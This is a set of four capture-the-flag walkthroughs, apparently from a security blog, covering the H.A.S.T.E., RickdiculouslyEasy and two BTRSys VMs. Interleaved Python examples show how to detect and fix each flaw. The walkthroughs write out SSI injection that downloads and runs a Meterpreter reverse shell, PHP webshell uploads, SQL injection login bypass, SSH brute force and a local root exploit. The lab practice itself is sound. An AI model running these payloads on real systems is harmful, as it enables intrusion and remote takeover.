Hack the H.A.S.T.E. VM Challenge

Hello friends! Today we are going to take another CTF challenge, known as ‘H.A.S.T.E.’. The credit for making this VM goes to “f1re_w1re”, and it is a unique challenge: all we have to do to complete it is get a reverse shell. You can download this VM here.

Let’s Breach!!!

Let us start from getting to know the IP of the VM (here I have it at 192.168.0.102, but you will have to find your own):

netdiscover

Use nmap for port enumeration

nmap -sV 192.168.0.102

We find that port 80 is open, so we open the IP address in our browser.

We don’t find anything on the page, so we use dirb to list the directories on the web server.

dirb http://192.168.0.102

When we open http://192.168.0.102/ssi we get a hint that the website may be vulnerable to server-side include (SSI) injection.

When we open http://192.168.0.102/index we find the code executed by the server.

Now we go back to http://192.168.0.102/ and use SSI injection to execute our commands.

We run the ‘ls -al’ command to check that it works; as you can see in the image below, our command ran successfully.

<!--#exec cmd="ls -la" -->

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.py

Now we upload our shell to the server using SSI injection.

<!--#exec cmd="wget http://192.168.0.107/shell.py" -->

After uploading the shell we use SSI injection to execute our payload.

<!--#exec cmd="python shell.py" -->

We set up our listener using Metasploit.
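A defender’s counterpart to the directives above, added here as an example and not part of the original post: a small Python check that flags SSI exec directives in request data (useful when reviewing logs for this kind of attempt) and the escaping that stops user input from ever being interpreted as a directive when it is echoed into a .shtml page. The request lines are constructed for the example. On Apache, `Options IncludesNOEXEC` additionally disables `exec` for included pages regardless of input.

```python
import html
import re

# Matches an SSI exec directive regardless of case or of the extra
# '#' and spacing some servers tolerate, e.g. <!--#exec cmd="ls -la" -->
SSI_EXEC_RE = re.compile(r"<!--\s*#+\s*exec\b[^>]*-->", re.IGNORECASE)

# Constructed sample requests (not taken from the original post), as a
# reverse proxy or application log might record their bodies/query strings.
SAMPLE_REQUESTS = [
    "GET /?q=hello HTTP/1.1",
    'POST / name=<!--#exec cmd="ls -la" -->',
    'POST / name=<!--##EXEC cmd="wget http://198.51.100.7/x" -->',
    "GET /index.shtml HTTP/1.1",
]


def find_ssi_exec(requests):
    """Return the request records that carry an SSI exec directive."""
    return [r for r in requests if SSI_EXEC_RE.search(r)]


def neutralize(user_input):
    """Escape user input before it is written into a page that mod_include
    will process. '<' becomes '&lt;', so the comment-style directive can
    never form; quote=True (the default) also escapes quotes for attribute
    contexts."""
    return html.escape(user_input)


if __name__ == "__main__":
    for hit in find_ssi_exec(SAMPLE_REQUESTS):
        print("SSI exec attempt:", hit)
    print(neutralize('<!--#exec cmd="id" -->'))
```

Escaping is the fix for the injection itself; the detector only catches attempts after the fact, so pair it with the server-side `IncludesNOEXEC` setting rather than relying on it alone.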

msf > use exploit/multi/handler

msf exploit(handler)> set payload python/meterpreter/reverse_tcp

msf exploit(handler)> set lhost 192.168.0.107

msf exploit(handler)> set lport 4444

msf exploit(handler)> exploit

As soon as we execute our payload we get a reverse shell. The main objective of the challenge was to get a reverse shell, so the challenge is complete.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

Hack the RickdiculouslyEasy VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge, known as RickdiculouslyEasy. The credit for making this VM goes to “Luke”, and it is another capture-the-flag challenge. Our goal is to capture flags worth 130 points in total to complete the challenge. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.107 as its network IP; now let’s use nmap to find the open ports.

nmap -p- -A 192.168.1.107

The nmap scan shows that ports 21, 80, 9090, 13337, 22222 and 60000 are open. It also shows that anonymous login is allowed on FTP.

We enumerate the open ports further using netcat and find two flags.

nc 192.168.1.107 13337

nc 192.168.1.107 60000

We open port 9090 in the web browser and find the third flag.

Now we use dirb to list the directories, as port 80 is open.

dirb http://192.168.1.107/

Using dirb we find a page, http://192.168.1.107/passwords/. When we open it we find two files, ‘FLAG.txt’ and ‘passwords.html’.

When we open the ‘FLAG.txt’ file we find our 4th flag.

Now we open the passwords.html file. We can’t find anything on the page, so we take a look at the source code of the file; inside we find a password for some user.

The nmap scan showed that FTP allows anonymous login, so we log in to FTP using ‘anonymous’ as both username and password.

Once on FTP we find a file called FLAG.txt; we open it and find our 5th flag.

We open robots.txt and find links to two files, root_shell.cgi and tracertool.cgi.

http://192.168.1.107/cgi-bin/tracertool.cgi is vulnerable to command injection.

We find that a few commands are filtered, so we use the ‘more’ command to read the usernames in the /etc/passwd file.

more /etc/passwd

Now we log in over SSH using the username Summer and the password winter that we found earlier.

ssh -p 22222 Summer@192.168.1.107
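To show why the CGI above is injectable and what the fix looks like, here is an added Python example (not the VM’s own tracertool.cgi code): the same “traceroute this host” feature written the vulnerable way, beside a hardened version that validates the parameter as an IP address or hostname and hands it to subprocess as a single argv element, so a value containing `;` never reaches a shell.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: dot-separated labels of letters, digits and
# hyphens, with no label starting or ending in a hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def vulnerable_command(host):
    """The shape of the bug: the parameter is pasted into a shell command
    line, so a ';' in it starts a second command. Returned as a string here
    for illustration rather than executed."""
    return "traceroute " + host


def valid_target(host):
    """Accept only an IPv4/IPv6 address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def build_traceroute_argv(host):
    """Hardened form: validate first, then build an argv list. With a list
    and shell=False nothing is parsed by a shell, and the allow-list above
    also guarantees the value cannot start with '-' and be read as an option."""
    if not valid_target(host):
        raise ValueError(f"rejected target: {host!r}")
    return ["traceroute", host]


def run_traceroute(host, timeout=60):
    """Run the validated command (assumes traceroute is installed)."""
    return subprocess.run(
        build_traceroute_argv(host), capture_output=True, text=True, timeout=timeout
    ).stdout


if __name__ == "__main__":
    print(vulnerable_command("8.8.8.8; more /etc/passwd"))   # two commands
    print(build_traceroute_argv("8.8.8.8"))                   # one argv element
```

Blacklisting individual commands, as the lab does, is what the ‘more’ trick above defeats; an allow-list on the input’s shape plus no shell at all is the durable fix.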

After connecting to ssh we find a file called FLAG.txt and inside the file we find our 6th flag.

Searching through the files, we come across an image and a zip file inside the Morty/ directory. We download the files to our system over SSH using scp.

scp Safe_Password.jpg [email protected]:/root/Desktop

scp journal.txt.zip [email protected]:/root/Desktop

After downloading the files we use the strings command to check whether something is hidden inside the image, and we find the password for unzipping the journal.txt.zip file.

strings Safe_Password.jpg

After unzipping the zip file, we open the file inside and find our 7th flag.

Back on the target VM we find an executable file called ‘safe’. We try to run it but we don’t have permission to, so we download the file to our system.

scp safe [email protected]:/root/Desktop

When we run the file it asks for an argument. We use the string found inside the last flag (131333) and get a hint about the password of the user RickSanchez.

The password consists of one uppercase character and one digit, followed by one of the words in the name of Rick Sanchez’s band. We find that the band Rick played in was called ‘The Flesh Curtains’, so we use crunch to create a dictionary (in a crunch -t pattern, ‘,’ stands for an uppercase letter and ‘%’ for a digit).

crunch 10 10 -t ,%Curtains -o /root/Desktop/pass.txt

crunch 7 7 -t ,%Flesh -o /root/Desktop/pass1.txt

After creating the dictionaries, we use the dymerge tool to combine both into a single dictionary.

python dymerge.py /root/Desktop/pass.txt /root/Desktop/pass1.txt -s -o /root/Desktop/password.txt

Now that our dictionary is ready we brute-force SSH using Metasploit.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.1.107

msf auxiliary(ssh_login) > set rport 22222

msf auxiliary(ssh_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(ssh_login) > set username RickSanchez

msf auxiliary(ssh_login) > run
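From the defending side, a dictionary attack like the one above is noisy in /var/log/auth.log. Added example (not part of the post): a Python detector run over constructed sshd log lines that flags a source/user pair with a burst of failed logins inside a short window and records whether a successful login followed the burst, which is the case worth escalating. The hostname, timestamps and source addresses are made up for the example; the source IPs are documentation addresses.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed auth.log excerpt (not from the original post).
SAMPLE_AUTH_LOG = """\
Oct 10 12:00:01 rick sshd[2311]: Failed password for RickSanchez from 203.0.113.9 port 40210 ssh2
Oct 10 12:00:02 rick sshd[2313]: Failed password for RickSanchez from 203.0.113.9 port 40212 ssh2
Oct 10 12:00:02 rick sshd[2315]: Failed password for RickSanchez from 203.0.113.9 port 40214 ssh2
Oct 10 12:00:03 rick sshd[2317]: Failed password for RickSanchez from 203.0.113.9 port 40216 ssh2
Oct 10 12:00:03 rick sshd[2319]: Failed password for RickSanchez from 203.0.113.9 port 40218 ssh2
Oct 10 12:00:04 rick sshd[2321]: Accepted password for RickSanchez from 203.0.113.9 port 40220 ssh2
Oct 10 12:05:00 rick sshd[2400]: Failed password for Summer from 192.0.2.4 port 50001 ssh2
"""

# Syslog-style sshd line: timestamp, host, process, then the auth result.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse(log_text, year=2017):
    """Turn matching lines into (timestamp, result, user, source) tuples.
    Syslog lines carry no year, so one is supplied (assumed here)."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Flag (src, user) pairs reaching `threshold` failures within `window`.
    If a success for the same pair comes after the burst, mark it: that is
    the pattern of a dictionary attack that worked."""
    failures = defaultdict(list)
    alerts = {}
    for ts, result, user, src in events:
        key = (src, user)
        if result == "Failed":
            failures[key] = [t for t in failures[key] if ts - t <= window] + [ts]
            if len(failures[key]) >= threshold:
                alerts.setdefault(key, {"failures": 0, "success_after": False})
                alerts[key]["failures"] = len(failures[key])
        elif key in alerts:
            alerts[key]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for (src, user), info in detect_bruteforce(parse(SAMPLE_AUTH_LOG)).items():
        print(f"{src} -> {user}: {info['failures']} failures, "
              f"success afterwards: {info['success_after']}")
```

Moving SSH to port 22222, as this VM does, changes nothing about this signal; rate limiting on failures per source (fail2ban or sshd’s MaxAuthTries) and key-based authentication are what remove the dictionary attack as an option.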

After brute-forcing SSH successfully, we spawn a proper terminal using python.

python -c 'import pty; pty.spawn("/bin/bash")'

After spawning the terminal, we take a look at the sudoers list. We find that we have all the privileges of root.

We switch to the root user and move to the root folder. Inside it we find a file called FLAG.txt; when we open it we find our final flag.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

Hack the BTRSys1 VM (Boot2Root Challenge)

BTRSys v1 is another lab by ‘ismailonderkaya’ in the BTRSys series. This lab helps you sharpen your skills as a pentester, and it is a must-do lab for a beginner.

Difficulty level: Beginner

WalkThrough

Let’s start with finding our target as always by using the following command:

netdiscover

Now we know our target is 192.168.0.105, so let’s use nmap on it. Nmap has many types of scan, but the aggressive scan (-A) is convenient as it combines them and gives all the information at once.

nmap -A 192.168.0.105

Through nmap we know that ports 21, 22 and 80 are open with the services FTP, SSH and HTTP respectively. As nmap hasn’t told us much, we dig deeper using nikto. Nikto is an open-source web server scanner that looks for dangerous files/programs, outdated versions, index files, HTTP server options, etc. To use nikto type:

nikto -h http://192.168.0.105

With the help of nikto we learn that there is a login page at /login.php.

Let’s go to the login page by typing the following in the URL bar:

192.168.0.105/login.php

So now we are on the login page, but we do not have credentials to log in. Let’s check its page source.

Now, in the page source, if you observe the function ‘control’ carefully you’ll realise that the username must end with @btrisk.com; therefore we can try SQL injection here, using the following steps:

Brute-force the login form with SQL injection payloads (when asked for the text file for the brute force, select the one with the list of SQL injection strings).

When the brute force completes it shows the SQL string that logs you in, as shown in the image above.


Right-click on that request and select ‘Show response in browser’ as shown above. This opens the browser and you will find yourself automatically logged in.

Login details: username @btrisk.com, password ' or ''='
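To make clear why that string works and how the bug is fixed, here is an added Python example (not the lab’s own PHP) using a constructed in-memory SQLite table: the first login function builds the query by string concatenation, so the quotes in the password close the literal and `or ''=''` makes the WHERE clause always true; the second binds parameters, so the same input is just a password that matches nothing.

```python
import sqlite3


def make_db():
    """Constructed user table for the demonstration (not the lab's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users VALUES ('admin@btrisk.com', 'correct horse battery staple')"
    )
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable: values are concatenated into the SQL text.
    With password = ' or ''=' the clause becomes
    password = '' or ''='' which is true for every row."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Fixed: placeholders are bound by the driver, never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or ''='"
    print("vulnerable login bypassed:", login_vulnerable(db, "@btrisk.com", payload))
    print("parameterised login bypassed:", login_safe(db, "@btrisk.com", payload))
```

The real login should also compare a password hash rather than a plaintext column, but the injection itself is closed by parameter binding alone.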

As we are logged in, there is an option to upload a file. Here we can upload our malicious PHP code. To generate the code, go to the Kali terminal and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

Copy the code from <?php to die(); and save it in a .txt file. After saving, change the extension from .txt to .php and upload it.

When you try to upload the .php file it says that only jpg and png files can be uploaded. Okay! So change the extension from .php to .jpg and upload it again, but this time remember to capture the request in Burp Suite.

Once the request is captured in Burp Suite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code is uploaded to the web application.

Our malicious file is uploaded, but we still have to find the directory it was uploaded to so that we can execute it and get our session. For that we use dirb:
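The reason the Burp trick works is that the extension check runs only in the browser, so anything that edits the request after it leaves the browser sidesteps it. Added Python example (not the lab’s upload handler): a server-side check that enforces an extension allow-list, verifies the file’s leading bytes against the declared image type, and stores the file under a random name so the uploader controls neither the stored extension nor the path. The byte strings are constructed for the example.

```python
import os
import secrets

# Allowed extensions and the file signatures each must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}


def client_side_only_check(filename):
    """What the lab's form effectively did: a test on the name the client
    sends. Since the client can send any name, this is not a control."""
    return os.path.splitext(filename)[1].lower() in ALLOWED


def validate_upload(filename, content):
    """Server-side check. The last extension must be allow-listed AND the
    content must carry that type's signature. Returns the name to store the
    file under: random, with the extension chosen by the server."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not any(content.startswith(sig) for sig in ALLOWED[ext]):
        raise ValueError("content does not match the declared image type")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    php_source = b"<?php phpinfo(); die(); ?>"          # constructed sample
    png_bytes = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16      # constructed sample
    for name, data in [("shell.php", php_source), ("shell.jpg", php_source),
                       ("photo.png", png_bytes)]:
        try:
            print(name, "->", validate_upload(name, data))
        except ValueError as err:
            print(name, "-> rejected:", err)
```

Checking leading bytes is not sufficient on its own (a file can carry a valid PNG header with PHP after it), so the uploads directory must also be served with script execution disabled; the server-chosen random name and extension are what make that combination hold.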

dirb http://192.168.0.105

Dirb shows a directory named uploads, so obviously that is where our file went. To execute the file type the following in the URL bar:

192.168.0.105/uploads/shell.php

As always, before executing the file, start your handler in Metasploit so you can catch the session. Open Metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 4444

exploit

After the handler is active and your file is executed, you will have your meterpreter session. Let’s check the system information:

sysinfo

Now that we have a meterpreter session, let’s explore a bit and look into the html directory:

cd /var/www/html

ls

There is a config.php file in /var/www/html. This file has often proven to be important, so let’s check it out.

cat config.php

Through config.php we learn that the username, password and database name are among the following words:

root

toor

deneme

Let’s now drop to a shell and try to log in to MySQL with these three keywords:

shell

mysql -uroot -p -Ddeneme

And then enter the password toor.

Once logged in, let’s list the tables:

show tables;

As shown in the image above there is a table named user. Let’s see what it contains:

select * from user;

From the table we now know that the password for root is asd123***. Let’s log in with it:

su root

asd123***

Let’s confirm our root access:

whoami

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

BTRSys v2.1 is a boot2root challenge developed by ‘ismailonderkaya’ in the BTRSys series. This is an amazing lab for practice which covers every technique.

Difficulty level: Intermediate

WalkThrough

Let’s start by finding our target, using the following command:

netdiscover

We know our target is 192.168.0.106, so we run nmap on it to learn which ports and services are open. Use the following command:

nmap -A 192.168.0.106

From nmap you can see that ports 21, 22 and 80 are open with the services FTP, SSH and HTTP respectively. As we still have a lot to find out, we use dirb. Dirb is a web content scanner: it scans the web application for files/directories, including hidden ones. Use the following command:

dirb http://192.168.0.106

As you can see in the image above, dirb found various files and directories such as robots.txt, upload, etc. You can also see that the target web application uses WordPress, so we can run a WordPress scan that enumerates themes, plugins and users with the following command:

./wpscan.rb -u http://192.168.0.106/wordpress/ --enumerate at --enumerate ap --enumerate u

As a result we found two users: btrisk and admin.

Now, if you try to log in as admin with the password admin, you get access to the dashboard. With that access you can place malicious PHP code in a theme file to get a meterpreter session. Generate the code with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command gives you PHP code. Copy it from <?php to die(); and paste it into the template as shown below:

Once the code is saved, execute it through the URL as shown:

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before opening the above URL, make sure your meterpreter handler is active. In Metasploit type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 4444

exploit

Once the handler is active and the URL is opened, you will have your session. Let’s check the information of the system we have entered:

sysinfo

Now let’s drop into a shell by simply typing:

shell

Through the shell we learn that the Ubuntu version is 16.04.2 and, fortunately, there is an exploit on exploit-db for this version of Ubuntu. Download this exploit.

This exploit achieves privilege escalation so that you can get root directly. Once the exploit is downloaded we need to compile it:

gcc 41458.c -o rootshell

Now that the exploit is compiled, upload it to the /tmp directory. From the meterpreter session, use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now drop to a shell, go to /tmp, make rootshell executable and run it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

And to confirm use the following command:

whoami

HURRAY!!!! We are root, and so our Boot2Root challenge is complete.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here